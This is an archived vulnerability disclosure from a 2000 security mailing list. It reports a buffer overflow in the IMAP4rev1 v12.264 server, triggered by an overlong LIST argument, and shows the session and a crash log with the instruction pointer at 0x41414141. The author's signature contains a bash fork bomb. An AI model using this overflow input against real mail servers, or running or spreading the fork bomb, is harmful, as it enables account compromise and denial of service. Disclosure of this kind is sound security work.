Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Subject: imapd4r1 v12.264
From: Michal Zalewski (lcamtufDIONE.IDS.PL)
Date: Sun Apr 16 2000 - 07:19:43 CDT

Newest RH:

* OK nimue IMAP4rev1 v12.264 server ready
1 login lcamtuf test
1 OK LOGIN completed
1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()


Privledges seems to be dropped, but, anyway, it's nice way to get shell
access to mail account, maybe grab some data from memory etc. I believe
both imap and ipopd packages need code security audit.

Michal Zalewski [lcamtuftpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

List przyszedł z listy <securemud.pl>